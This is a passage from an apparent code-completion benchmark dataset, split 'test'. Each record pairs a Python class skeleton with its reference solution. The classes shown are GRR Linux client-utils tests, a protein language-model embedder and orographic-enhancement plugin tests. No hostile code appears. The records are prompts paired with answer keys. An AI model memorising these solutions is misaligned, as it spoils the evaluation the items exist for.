expected_path, device_type in [('/etc/passwd', '/dev/mapper/root', '/etc/passwd', rdf_paths.PathSpec.PathType.OS), ('/usr/local/bin/ls', '/dev/mapper/usr', '/bin/ls', rdf_paths.PathSpec.PathType.OS), ('/proc/net/sys', 'none', '/net/sys', rdf_paths.PathSpec.PathType.UNSET), ('/home/user/test.txt', 'server.nfs:/vol/home', '/test.txt', rdf_paths.PathSpec.PathType.UNSET)]:\n raw_pathspec, path = client_utils_linux.GetRawDevice(filename)\n self.assertEqual(expected_device, raw_pathspec.path)\n self.assertEqual(device_type, raw_pathspec.pathtype)\n self.assertEqual(expected_path, path)\n<|end_body_0|>\n\n<|body_start_1|>\n with tempfile.NamedTemporaryFile() as fd:\n log = client_utils_linux.TransactionLog(logfile=fd.name)\n grr_message = rdf_flows.GrrMessage(session_id='W:test')\n log.Write(grr_message)\n self.assertEqual(grr_message, log.Get())\n log.Clear()\n self.assertIsNone(log.Get())\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000234", "length_bytes": 4763, "license_type": "permissive", "methods": [{"docstring": "Test the parser for linux mounts.", "name": "testLinuxGetRawDevice", "signature": "def testLinuxGetRawDevice(self)"}, {"docstring": "Tests the linux transaction log.", "name": "testLinuxTransactionLog", "signature": "def testLinuxTransactionLog(self)"}], "n_methods": 2, "prompt": "Implement the Python class `ClientUtilsLinuxTest` described below.\n\nClass description:\nTest the linux client utils.\n\nMethod signatures and docstrings:\n- def testLinuxGetRawDevice(self): Test the parser for linux mounts.\n- def testLinuxTransactionLog(self): Tests the linux transaction log.", "prompted_full_text": "Implement the Python class `ClientUtilsLinuxTest` described below.\n\nClass description:\nTest the linux client utils.\n\nMethod signatures and docstrings:\n- def testLinuxGetRawDevice(self): Test the parser for linux mounts.\n- def testLinuxTransactionLog(self): Tests the linux transaction log.\n\n<|skeleton|>\nclass ClientUtilsLinuxTest:\n \"\"\"Test the linux client utils.\"\"\"\n\n def testLinuxGetRawDevice(self):\n \"\"\"Test the parser for linux mounts.\"\"\"\n <|body_0|>\n\n def testLinuxTransactionLog(self):\n \"\"\"Tests the linux transaction log.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n proc_mounts = 'rootfs / rootfs rw 0 0\\nnone /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0\\nnone /proc proc rw,nosuid,nodev,noexec,relatime 0 0\\nnone /dev devtmpfs rw,relatime,size=4056920k,nr_inodes=1014230,mode=755 0 0\\nnone /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0\\n/dev/mapper/root / ext4 rw,relatime,errors=remount-ro,barrier=1,data=ordered 0 0\\nnone /sys/fs/fuse/connections fusectl rw,relatime 0 0\\nnone /sys/kernel/debug debugfs rw,relatime 0 0\\nnone /sys/kernel/security securityfs rw,relatime 0 0\\nnone /dev/shm tmpfs rw,nosuid,nodev,relatime 0 0\\nnone /var/run tmpfs rw,nosuid,relatime 0 0\\nnone /var/lock tmpfs rw,nosuid,nodev,noexec,relatime 0 0\\nnone /lib/init/rw tmpfs rw,nosuid,relatime,mode=755 0 0\\n/dev/sda1 /boot ext2 rw,relatime,errors=continue 0 0\\n/dev/mapper/usr /usr/local/ ext4 rw,relatime,barrier=1,data=writeback 0 0\\nbinfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw,nosuid,relatime 0 0\\nserver.nfs:/vol/home /home/user nfs rw,nosuid,relatime 0 0\\n'\n with contextlib.ExitStack() as stack:\n stack.enter_context(mock.patch.object(client_utils_linux, 'MOUNTPOINT_CACHE', new=[0, None]))\n mountpoints = client_utils_linux.GetMountpoints(proc_mounts)\n 
stack.enter_context(mock.patch.object(client_utils_linux, 'GetMountpoints', return_value=mountpoints))\n for filename, expected_device, expected_path, device_type in [('/etc/passwd', '/dev/mapper/root', '/etc/passwd', rdf_paths.PathSpec.PathType.OS), ('/usr/local/bin/ls', '/dev/mapper/usr', '/bin/ls', rdf_paths.PathSpec.PathType.OS), ('/proc/net/sys', 'none', '/net/sys', rdf_paths.PathSpec.PathType.UNSET), ('/home/user/test.txt', 'server.nfs:/vol/home', '/test.txt', rdf_paths.PathSpec.PathType.UNSET)]:\n raw_pathspec, path = client_utils_linux.GetRawDevice(filename)\n self.assertEqual(expected_device, raw_pathspec.path)\n self.assertEqual(device_type, raw_pathspec.pathtype)\n self.assertEqual(expected_path, path)\n<|end_body_0|>\n\n<|body_start_1|>\n with tempfile.NamedTemporaryFile() as fd:\n log = client_utils_linux.TransactionLog(logfile=fd.name)\n grr_message = rdf_flows.GrrMessage(session_id='W:test')\n log.Write(grr_message)\n self.assertEqual(grr_message, log.Get())\n log.Clear()\n self.assertIsNone(log.Get())\n<|end_body_1|>\n", "revision_id": "44c0eb8c938302098ef7efae8cfd6b90bcfbb2d6", "skeleton": "<|skeleton|>\nclass ClientUtilsLinuxTest:\n \"\"\"Test the linux client utils.\"\"\"\n\n def testLinuxGetRawDevice(self):\n \"\"\"Test the parser for linux mounts.\"\"\"\n <|body_0|>\n\n def testLinuxTransactionLog(self):\n \"\"\"Tests the linux transaction log.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ClientUtilsLinuxTest:\n \"\"\"Test the linux client utils.\"\"\"\n\n def testLinuxGetRawDevice(self):\n \"\"\"Test the parser for linux mounts.\"\"\"\n proc_mounts = 'rootfs / rootfs rw 0 0\\nnone /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0\\nnone /proc proc rw,nosuid,nodev,noexec,relatime 0 0\\nnone /dev devtmpfs rw,relatime,size=4056920k,nr_inodes=1014230,mode=755 0 0\\nnone /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0\\n/dev/mapper/root / ext4 rw,relatime,errors=remount-ro,barrier=1,data=ordered 0 0\\nnone /sys/fs/fuse/connections fusectl rw,relatime 0 0\\nnone /sys/kernel/debug debugfs rw,relatime 0 0\\nnone /sys/kernel/security securityfs rw,relatime 0 0\\nnone /dev/shm tmpfs rw,nosuid,nodev,relatime 0 0\\nnone /var/run tmpfs rw,nosuid,relatime 0 0\\nnone /var/lock tmpfs rw,nosuid,nodev,noexec,relatime 0 0\\nnone /lib/init/rw tmpfs rw,nosuid,relatime,mode=755 0 0\\n/dev/sda1 /boot ext2 rw,relatime,errors=continue 0 0\\n/dev/mapper/usr /usr/local/ ext4 rw,relatime,barrier=1,data=writeback 0 0\\nbinfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw,nosuid,relatime 0 0\\nserver.nfs:/vol/home /home/user nfs rw,nosuid,relatime 0 0\\n'\n with contextlib.ExitStack() as stack:\n stack.enter_context(mock.patch.object(client_utils_linux, 'MOUNTPOINT_CACHE', new=[0, None]))\n mountpoints = client_utils_linux.GetMountpoints(proc_mounts)\n stack.enter_context(mock.patch.object(client_utils_linux, 'GetMountpoints', return_value=mountpoints))\n for filename, expected_device, expected_path, device_type in [('/etc/passwd', '/dev/mapper/root', '/etc/passwd', rdf_paths.PathSpec.PathType.OS), ('/usr/local/bin/ls', '/dev/mapper/usr', '/bin/ls', rdf_paths.PathSpec.PathType.OS), ('/proc/net/sys', 'none', '/net/sys', rdf_paths.PathSpec.PathType.UNSET), ('/home/user/test.txt', 'server.nfs:/vol/home', '/test.txt', rdf_paths.PathSpec.PathType.UNSET)]:\n raw_pathspec, path = client_utils_linux.GetRawDevice(filename)\n self.assertEqual(expected_device, 
raw_pathspec.path)\n self.assertEqual(device_type, raw_pathspec.pathtype)\n self.assertEqual(expected_path, path)\n\n def testLinuxTransactionLog(self):\n \"\"\"Tests the linux transaction log.\"\"\"\n with tempfile.NamedTemporaryFile() as fd:\n log = client_utils_linux.TransactionLog(logfile=fd.name)\n grr_message = rdf_flows.GrrMessage(session_id='W:test')\n log.Write(grr_message)\n self.assertEqual(grr_message, log.Get())\n log.Clear()\n self.assertIsNone(log.Get())\n", "source": "the_stack_v2_python_sparse", "source_path": "grr/client/grr_response_client/linux/client_utils_linux_test.py", "source_repo": "google/grr", "split": "test", "star_events_count": 4683} {"blob_id": "96748a3bc73d3ec479c89c274e543ead6c08b71d", "bodies": ["self._embed_fn = get_embed_fn(model=model, checkpoint_dir=checkpoint_dir, domain=domain, output_head=output_head, reduce_fn=reduce_fn)\nself._batch_size = batch_size\nself._domain = domain\nself._length = length", "if isinstance(sequences[0], str):\n sequences = _encode_string_sequences(sequences, domain=self._domain, length=self._length)\nreturn utils.batch_apply(self._embed_fn, sequences, self._batch_size)"], "bodies_text": "<|body_start_0|>\n self._embed_fn = get_embed_fn(model=model, checkpoint_dir=checkpoint_dir, domain=domain, output_head=output_head, reduce_fn=reduce_fn)\n self._batch_size = batch_size\n self._domain = domain\n self._length = length\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(sequences[0], str):\n sequences = _encode_string_sequences(sequences, domain=self._domain, length=self._length)\n return utils.batch_apply(self._embed_fn, sequences, self._batch_size)\n<|end_body_1|>\n", "class_docstring": "Embeddings from a pretrained language model. Stateful wrapper around get_embed_fn that calls the embed_fn on batches.", "class_name": "ProteinLMEmbedder", "detected_licenses": ["Apache-2.0", "CC-BY-4.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ProteinLMEmbedder:\n \"\"\"Embeddings from a pretrained language model. Stateful wrapper around get_embed_fn that calls the embed_fn on batches.\"\"\"\n\n def __init__(self, model=None, checkpoint_dir=None, domain=None, output_head='output_emb', reduce_fn=None, length=None, batch_size=64):\n \"\"\"Creates an instance of this class.\"\"\"\n <|body_0|>\n\n def __call__(self, sequences):\n \"\"\"Embeds int or string sequences.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._embed_fn = get_embed_fn(model=model, checkpoint_dir=checkpoint_dir, domain=domain, output_head=output_head, reduce_fn=reduce_fn)\n self._batch_size = batch_size\n self._domain = domain\n self._length = length\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(sequences[0], str):\n sequences = _encode_string_sequences(sequences, domain=self._domain, length=self._length)\n return utils.batch_apply(self._embed_fn, sequences, self._batch_size)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000235", "length_bytes": 8676, "license_type": "permissive", "methods": [{"docstring": "Creates an instance of this class.", "name": "__init__", "signature": "def __init__(self, model=None, checkpoint_dir=None, domain=None, output_head='output_emb', reduce_fn=None, length=None, batch_size=64)"}, {"docstring": "Embeds int or string sequences.", "name": "__call__", "signature": "def __call__(self, sequences)"}], "n_methods": 2, "prompt": "Implement the Python class `ProteinLMEmbedder` described below.\n\nClass description:\nEmbeddings from a pretrained language model. 
Stateful wrapper around get_embed_fn that calls the embed_fn on batches.\n\nMethod signatures and docstrings:\n- def __init__(self, model=None, checkpoint_dir=None, domain=None, output_head='output_emb', reduce_fn=None, length=None, batch_size=64): Creates an instance of this class.\n- def __call__(self, sequences): Embeds int or string sequences.", "prompted_full_text": "Implement the Python class `ProteinLMEmbedder` described below.\n\nClass description:\nEmbeddings from a pretrained language model. Stateful wrapper around get_embed_fn that calls the embed_fn on batches.\n\nMethod signatures and docstrings:\n- def __init__(self, model=None, checkpoint_dir=None, domain=None, output_head='output_emb', reduce_fn=None, length=None, batch_size=64): Creates an instance of this class.\n- def __call__(self, sequences): Embeds int or string sequences.\n\n<|skeleton|>\nclass ProteinLMEmbedder:\n \"\"\"Embeddings from a pretrained language model. Stateful wrapper around get_embed_fn that calls the embed_fn on batches.\"\"\"\n\n def __init__(self, model=None, checkpoint_dir=None, domain=None, output_head='output_emb', reduce_fn=None, length=None, batch_size=64):\n \"\"\"Creates an instance of this class.\"\"\"\n <|body_0|>\n\n def __call__(self, sequences):\n \"\"\"Embeds int or string sequences.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._embed_fn = get_embed_fn(model=model, checkpoint_dir=checkpoint_dir, domain=domain, output_head=output_head, reduce_fn=reduce_fn)\n self._batch_size = batch_size\n self._domain = domain\n self._length = length\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(sequences[0], str):\n sequences = _encode_string_sequences(sequences, domain=self._domain, length=self._length)\n return utils.batch_apply(self._embed_fn, sequences, self._batch_size)\n<|end_body_1|>\n", "revision_id": "5573d9c5822f4e866b6692769963ae819cb3f10d", "skeleton": "<|skeleton|>\nclass ProteinLMEmbedder:\n \"\"\"Embeddings from a pretrained language model. Stateful wrapper around get_embed_fn that calls the embed_fn on batches.\"\"\"\n\n def __init__(self, model=None, checkpoint_dir=None, domain=None, output_head='output_emb', reduce_fn=None, length=None, batch_size=64):\n \"\"\"Creates an instance of this class.\"\"\"\n <|body_0|>\n\n def __call__(self, sequences):\n \"\"\"Embeds int or string sequences.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ProteinLMEmbedder:\n \"\"\"Embeddings from a pretrained language model. 
Stateful wrapper around get_embed_fn that calls the embed_fn on batches.\"\"\"\n\n def __init__(self, model=None, checkpoint_dir=None, domain=None, output_head='output_emb', reduce_fn=None, length=None, batch_size=64):\n \"\"\"Creates an instance of this class.\"\"\"\n self._embed_fn = get_embed_fn(model=model, checkpoint_dir=checkpoint_dir, domain=domain, output_head=output_head, reduce_fn=reduce_fn)\n self._batch_size = batch_size\n self._domain = domain\n self._length = length\n\n def __call__(self, sequences):\n \"\"\"Embeds int or string sequences.\"\"\"\n if isinstance(sequences[0], str):\n sequences = _encode_string_sequences(sequences, domain=self._domain, length=self._length)\n return utils.batch_apply(self._embed_fn, sequences, self._batch_size)\n", "source": "the_stack_v2_python_sparse", "source_path": "protein_lm/embed.py", "source_repo": "Jimmy-INL/google-research", "split": "test", "star_events_count": 1} {"blob_id": "85f47f0d3e6a9c0418d427d00de354e8fc2f4223", "bodies": ["orogenh = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\nself.assertIsInstance(orogenh, iris.cube.Cube)\nself.assertEqual(orogenh.data.dtype, 'float32')\nfor coord in orogenh.coords(dim_coords=True):\n self.assertEqual(coord.points.dtype, 'float32')", "self.temperature.coord('forecast_reference_time').points = self.temperature.coord('forecast_reference_time').points - 3600\nself.temperature.coord('forecast_period').points = self.temperature.coord('forecast_period').points - 3600\nmsg = 'Input cube coordinates'\nwith self.assertRaisesRegex(ValueError, msg):\n _ = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)", "temperature = set_up_invalid_variable_cube(self.temperature)\nhumidity = set_up_invalid_variable_cube(self.humidity)\npressure = set_up_invalid_variable_cube(self.pressure)\nuwind = set_up_invalid_variable_cube(self.uwind)\nvwind = set_up_invalid_variable_cube(self.vwind)\nmsg = 'Require 2D fields as input; found 3 dimensions'\nwith self.assertRaisesRegex(ValueError, msg):\n _ = self.plugin.process(temperature, humidity, pressure, uwind, vwind, self.orography_cube)", "cube_list = [self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube]\ncopied_cubes = []\nfor cube in cube_list:\n copied_cubes.append(cube.copy())\n_ = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\nfor cube, copy in zip(cube_list, copied_cubes):\n self.assertArrayAlmostEqual(cube.data, copy.data)\n self.assertEqual(cube.metadata, copy.metadata)", "expected_data = np.array([[2.6524199e-07, 3.4075157e-07, 2.5099993e-07, 9.1911055e-08, 1.748189e-08, 1.5676112e-09], [1.6797775e-07, 2.4365076e-07, 1.7639361e-07, 9.1911055e-08, 1.748189e-08, 1.5676112e-09], [4.1531862e-08, 4.1531862e-08, 8.9591637e-08, 2.8731334e-08, 5.3441389e-09, 1.5676112e-09], [8.571111e-10, 8.571111e-10, 8.571111e-10, 8.571111e-10, 2.1291666e-09, 2.4547223e-10]], dtype=np.float32)\norogenh = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\nself.assertArrayAlmostEqual(orogenh.data, expected_data)\nself.assertAlmostEqual(self.plugin.grid_spacing_km, 1.0)"], "bodies_text": "<|body_start_0|>\n orogenh = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n self.assertIsInstance(orogenh, iris.cube.Cube)\n 
self.assertEqual(orogenh.data.dtype, 'float32')\n for coord in orogenh.coords(dim_coords=True):\n self.assertEqual(coord.points.dtype, 'float32')\n<|end_body_0|>\n\n<|body_start_1|>\n self.temperature.coord('forecast_reference_time').points = self.temperature.coord('forecast_reference_time').points - 3600\n self.temperature.coord('forecast_period').points = self.temperature.coord('forecast_period').points - 3600\n msg = 'Input cube coordinates'\n with self.assertRaisesRegex(ValueError, msg):\n _ = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n<|end_body_1|>\n\n<|body_start_2|>\n temperature = set_up_invalid_variable_cube(self.temperature)\n humidity = set_up_invalid_variable_cube(self.humidity)\n pressure = set_up_invalid_variable_cube(self.pressure)\n uwind = set_up_invalid_variable_cube(self.uwind)\n vwind = set_up_invalid_variable_cube(self.vwind)\n msg = 'Require 2D fields as input; found 3 dimensions'\n with self.assertRaisesRegex(ValueError, msg):\n _ = self.plugin.process(temperature, humidity, pressure, uwind, vwind, self.orography_cube)\n<|end_body_2|>\n\n<|body_start_3|>\n cube_list = [self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube]\n copied_cubes = []\n for cube in cube_list:\n copied_cubes.append(cube.copy())\n _ = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n for cube, copy in zip(cube_list, copied_cubes):\n self.assertArrayAlmostEqual(cube.data, copy.data)\n self.assertEqual(cube.metadata, copy.metadata)\n<|end_body_3|>\n\n<|body_start_4|>\n expected_data = np.array([[2.6524199e-07, 3.4075157e-07, 2.5099993e-07, 9.1911055e-08, 1.748189e-08, 1.5676112e-09], [1.6797775e-07, 2.4365076e-07, 1.7639361e-07, 9.1911055e-08, 1.748189e-08, 1.5676112e-09], [4.1531862e-08, 4.1531862e-08, 8.9591637e-08, 2.8731334e-08, 5.3441389e-09, 1.5676112e-09], [8.571111e-10, 8.571111e-10, 8.571111e-10, 8.571111e-10, 2.1291666e-09, 2.4547223e-10]], dtype=np.float32)\n orogenh = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n self.assertArrayAlmostEqual(orogenh.data, expected_data)\n self.assertAlmostEqual(self.plugin.grid_spacing_km, 1.0)\n<|end_body_4|>\n", "class_docstring": "Test the process method", "class_name": "Test_process", "detected_licenses": ["BSD-3-Clause", "LicenseRef-scancode-proprietary-license"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Test_process:\n \"\"\"Test the process method\"\"\"\n\n def test_basic(self):\n \"\"\"Test output is float32 cube with float32 coordinates\"\"\"\n <|body_0|>\n\n def test_unmatched_coords(self):\n \"\"\"Test error thrown if input variable cubes do not match\"\"\"\n <|body_1|>\n\n def test_extra_dimensions(self):\n \"\"\"Test error thrown if input variable cubes have an extra dimension\"\"\"\n <|body_2|>\n\n def test_inputs_unmodified(self):\n \"\"\"Test the process method does not modify any of the input cubes\"\"\"\n <|body_3|>\n\n def test_values(self):\n \"\"\"Test values of output\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n orogenh = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n self.assertIsInstance(orogenh, iris.cube.Cube)\n self.assertEqual(orogenh.data.dtype, 'float32')\n for coord in orogenh.coords(dim_coords=True):\n self.assertEqual(coord.points.dtype, 
'float32')\n<|end_body_0|>\n\n<|body_start_1|>\n self.temperature.coord('forecast_reference_time').points = self.temperature.coord('forecast_reference_time').points - 3600\n self.temperature.coord('forecast_period').points = self.temperature.coord('forecast_period').points - 3600\n msg = 'Input cube coordinates'\n with self.assertRaisesRegex(ValueError, msg):\n _ = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n<|end_body_1|>\n\n<|body_start_2|>\n temperature = set_up_invalid_variable_cube(self.temperature)\n humidity = set_up_invalid_variable_cube(self.humidity)\n pressure = set_up_invalid_variable_cube(self.pressure)\n uwind = set_up_invalid_variable_cube(self.uwind)\n vwind = set_up_invalid_variable_cube(self.vwind)\n msg = 'Require 2D fields as input; found 3 dimensions'\n with self.assertRaisesRegex(ValueError, msg):\n _ = self.plugin.process(temperature, humidity, pressure, uwind, vwind, self.orography_cube)\n<|end_body_2|>\n\n<|body_start_3|>\n cube_list = [self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube]\n copied_cubes = []\n for cube in cube_list:\n copied_cubes.append(cube.copy())\n _ = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n for cube, copy in zip(cube_list, copied_cubes):\n self.assertArrayAlmostEqual(cube.data, copy.data)\n self.assertEqual(cube.metadata, copy.metadata)\n<|end_body_3|>\n\n<|body_start_4|>\n expected_data = np.array([[2.6524199e-07, 3.4075157e-07, 2.5099993e-07, 9.1911055e-08, 1.748189e-08, 1.5676112e-09], [1.6797775e-07, 2.4365076e-07, 1.7639361e-07, 9.1911055e-08, 1.748189e-08, 1.5676112e-09], [4.1531862e-08, 4.1531862e-08, 8.9591637e-08, 2.8731334e-08, 5.3441389e-09, 1.5676112e-09], [8.571111e-10, 8.571111e-10, 8.571111e-10, 8.571111e-10, 2.1291666e-09, 2.4547223e-10]], dtype=np.float32)\n orogenh = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n self.assertArrayAlmostEqual(orogenh.data, expected_data)\n self.assertAlmostEqual(self.plugin.grid_spacing_km, 1.0)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000236", "length_bytes": 34979, "license_type": "permissive", "methods": [{"docstring": "Test output is float32 cube with float32 coordinates", "name": "test_basic", "signature": "def test_basic(self)"}, {"docstring": "Test error thrown if input variable cubes do not match", "name": "test_unmatched_coords", "signature": "def test_unmatched_coords(self)"}, {"docstring": "Test error thrown if input variable cubes have an extra dimension", "name": "test_extra_dimensions", "signature": "def test_extra_dimensions(self)"}, {"docstring": "Test the process method does not modify any of the input cubes", "name": "test_inputs_unmodified", "signature": "def test_inputs_unmodified(self)"}, {"docstring": "Test values of output", "name": "test_values", "signature": "def test_values(self)"}], "n_methods": 5, "prompt": "Implement the Python class `Test_process` described below.\n\nClass description:\nTest the process method\n\nMethod signatures and docstrings:\n- def test_basic(self): Test output is float32 cube with float32 coordinates\n- def test_unmatched_coords(self): Test error thrown if input variable cubes do not match\n- def test_extra_dimensions(self): Test error thrown if input variable cubes have an extra dimension\n- def test_inputs_unmodified(self): Test the process method does not modify any of the 
input cubes\n- def test_values(self): Test values of output", "prompted_full_text": "Implement the Python class `Test_process` described below.\n\nClass description:\nTest the process method\n\nMethod signatures and docstrings:\n- def test_basic(self): Test output is float32 cube with float32 coordinates\n- def test_unmatched_coords(self): Test error thrown if input variable cubes do not match\n- def test_extra_dimensions(self): Test error thrown if input variable cubes have an extra dimension\n- def test_inputs_unmodified(self): Test the process method does not modify any of the input cubes\n- def test_values(self): Test values of output\n\n<|skeleton|>\nclass Test_process:\n \"\"\"Test the process method\"\"\"\n\n def test_basic(self):\n \"\"\"Test output is float32 cube with float32 coordinates\"\"\"\n <|body_0|>\n\n def test_unmatched_coords(self):\n \"\"\"Test error thrown if input variable cubes do not match\"\"\"\n <|body_1|>\n\n def test_extra_dimensions(self):\n \"\"\"Test error thrown if input variable cubes have an extra dimension\"\"\"\n <|body_2|>\n\n def test_inputs_unmodified(self):\n \"\"\"Test the process method does not modify any of the input cubes\"\"\"\n <|body_3|>\n\n def test_values(self):\n \"\"\"Test values of output\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n orogenh = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n self.assertIsInstance(orogenh, iris.cube.Cube)\n self.assertEqual(orogenh.data.dtype, 'float32')\n for coord in orogenh.coords(dim_coords=True):\n self.assertEqual(coord.points.dtype, 'float32')\n<|end_body_0|>\n\n<|body_start_1|>\n self.temperature.coord('forecast_reference_time').points = self.temperature.coord('forecast_reference_time').points - 3600\n self.temperature.coord('forecast_period').points = self.temperature.coord('forecast_period').points - 3600\n msg = 'Input cube coordinates'\n with self.assertRaisesRegex(ValueError, msg):\n _ = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n<|end_body_1|>\n\n<|body_start_2|>\n temperature = set_up_invalid_variable_cube(self.temperature)\n humidity = set_up_invalid_variable_cube(self.humidity)\n pressure = set_up_invalid_variable_cube(self.pressure)\n uwind = set_up_invalid_variable_cube(self.uwind)\n vwind = set_up_invalid_variable_cube(self.vwind)\n msg = 'Require 2D fields as input; found 3 dimensions'\n with self.assertRaisesRegex(ValueError, msg):\n _ = self.plugin.process(temperature, humidity, pressure, uwind, vwind, self.orography_cube)\n<|end_body_2|>\n\n<|body_start_3|>\n cube_list = [self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube]\n copied_cubes = []\n for cube in cube_list:\n copied_cubes.append(cube.copy())\n _ = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n for cube, copy in zip(cube_list, copied_cubes):\n self.assertArrayAlmostEqual(cube.data, copy.data)\n self.assertEqual(cube.metadata, copy.metadata)\n<|end_body_3|>\n\n<|body_start_4|>\n expected_data = np.array([[2.6524199e-07, 3.4075157e-07, 2.5099993e-07, 9.1911055e-08, 1.748189e-08, 1.5676112e-09], [1.6797775e-07, 2.4365076e-07, 1.7639361e-07, 9.1911055e-08, 1.748189e-08, 1.5676112e-09], [4.1531862e-08, 4.1531862e-08, 8.9591637e-08, 2.8731334e-08, 5.3441389e-09, 1.5676112e-09], [8.571111e-10, 8.571111e-10, 8.571111e-10, 8.571111e-10, 2.1291666e-09, 2.4547223e-10]], 
dtype=np.float32)\n orogenh = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n self.assertArrayAlmostEqual(orogenh.data, expected_data)\n self.assertAlmostEqual(self.plugin.grid_spacing_km, 1.0)\n<|end_body_4|>\n", "revision_id": "cd2c9019944345df1e703bf8f625db537ad9f559", "skeleton": "<|skeleton|>\nclass Test_process:\n \"\"\"Test the process method\"\"\"\n\n def test_basic(self):\n \"\"\"Test output is float32 cube with float32 coordinates\"\"\"\n <|body_0|>\n\n def test_unmatched_coords(self):\n \"\"\"Test error thrown if input variable cubes do not match\"\"\"\n <|body_1|>\n\n def test_extra_dimensions(self):\n \"\"\"Test error thrown if input variable cubes have an extra dimension\"\"\"\n <|body_2|>\n\n def test_inputs_unmodified(self):\n \"\"\"Test the process method does not modify any of the input cubes\"\"\"\n <|body_3|>\n\n def test_values(self):\n \"\"\"Test values of output\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Test_process:\n \"\"\"Test the process method\"\"\"\n\n def test_basic(self):\n \"\"\"Test output is float32 cube with float32 coordinates\"\"\"\n orogenh = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n self.assertIsInstance(orogenh, iris.cube.Cube)\n self.assertEqual(orogenh.data.dtype, 'float32')\n for coord in orogenh.coords(dim_coords=True):\n self.assertEqual(coord.points.dtype, 'float32')\n\n def test_unmatched_coords(self):\n \"\"\"Test error thrown if input variable cubes do not match\"\"\"\n self.temperature.coord('forecast_reference_time').points = self.temperature.coord('forecast_reference_time').points - 3600\n self.temperature.coord('forecast_period').points = self.temperature.coord('forecast_period').points - 3600\n msg = 'Input cube coordinates'\n with self.assertRaisesRegex(ValueError, msg):\n _ = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n\n def test_extra_dimensions(self):\n \"\"\"Test error thrown if input variable cubes have an extra dimension\"\"\"\n temperature = set_up_invalid_variable_cube(self.temperature)\n humidity = set_up_invalid_variable_cube(self.humidity)\n pressure = set_up_invalid_variable_cube(self.pressure)\n uwind = set_up_invalid_variable_cube(self.uwind)\n vwind = set_up_invalid_variable_cube(self.vwind)\n msg = 'Require 2D fields as input; found 3 dimensions'\n with self.assertRaisesRegex(ValueError, msg):\n _ = self.plugin.process(temperature, humidity, pressure, uwind, vwind, self.orography_cube)\n\n def test_inputs_unmodified(self):\n \"\"\"Test the process method does not modify any of the input cubes\"\"\"\n cube_list = [self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube]\n copied_cubes = []\n for cube in cube_list:\n copied_cubes.append(cube.copy())\n _ = self.plugin.process(self.temperature, self.humidity, self.pressure, self.uwind, self.vwind, self.orography_cube)\n for cube, copy in zip(cube_list, copied_cubes):\n self.assertArrayAlmostEqual(cube.data, copy.data)\n self.assertEqual(cube.metadata, copy.metadata)\n\n def test_values(self):\n \"\"\"Test values of output\"\"\"\n expected_data = np.array([[2.6524199e-07, 3.4075157e-07, 2.5099993e-07, 9.1911055e-08, 1.748189e-08, 1.5676112e-09], [1.6797775e-07, 2.4365076e-07, 1.7639361e-07, 9.1911055e-08, 
